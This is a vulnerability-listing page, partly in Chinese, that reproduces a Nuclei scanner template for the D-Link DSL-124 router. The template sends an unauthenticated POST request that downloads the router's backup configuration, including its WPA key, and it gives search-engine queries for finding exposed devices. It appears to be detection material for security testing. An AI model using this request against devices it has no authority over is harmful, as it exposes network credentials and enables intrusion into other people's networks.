dlink-n300-backup: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure

日期: 2025-08-01 | 影响软件: dlink n300 backup | POC: 已公开

漏洞描述

The DSL-124 Wireless N300 ADSL2+ router exposes a backup configuration file that can be downloaded without authentication.

PoC代码[已公开]

id: dlink-n300-backup

info:
  name: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
  author: DhiyaneshDk
  severity: high
  description: |
    The DSL-124 Wireless N300 ADSL2+ router exposes a backup configuration file that can be downloaded without authentication.
  reference:
    - https://www.exploit-db.com/exploits/51129
  metadata:
    max-request: 1
    shodan-query: 'Server: Virtual Web 0.9'
    fofa-query: body="DSL-124"
  tags: dsl,d-link,disclosure,backup,vuln

http:
  - raw:
      - |
        POST /form2saveConf.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        submit.htm?saveconf.htm=Back+Settings

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "WLAN_WPA_PSK", "Config")'
          - 'contains(content_type, "application/octet-stream")'
        condition: and
# digest: 4b0a00483046022100a52ed674eade525712cb44fc7f69f2b98715f08d845e834c7d813bbc23ade901022100ca9ab378e6d43d6043b892b30edb902860953f82ee522971445c20f9309791e1:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/dlink-n300-backup.yaml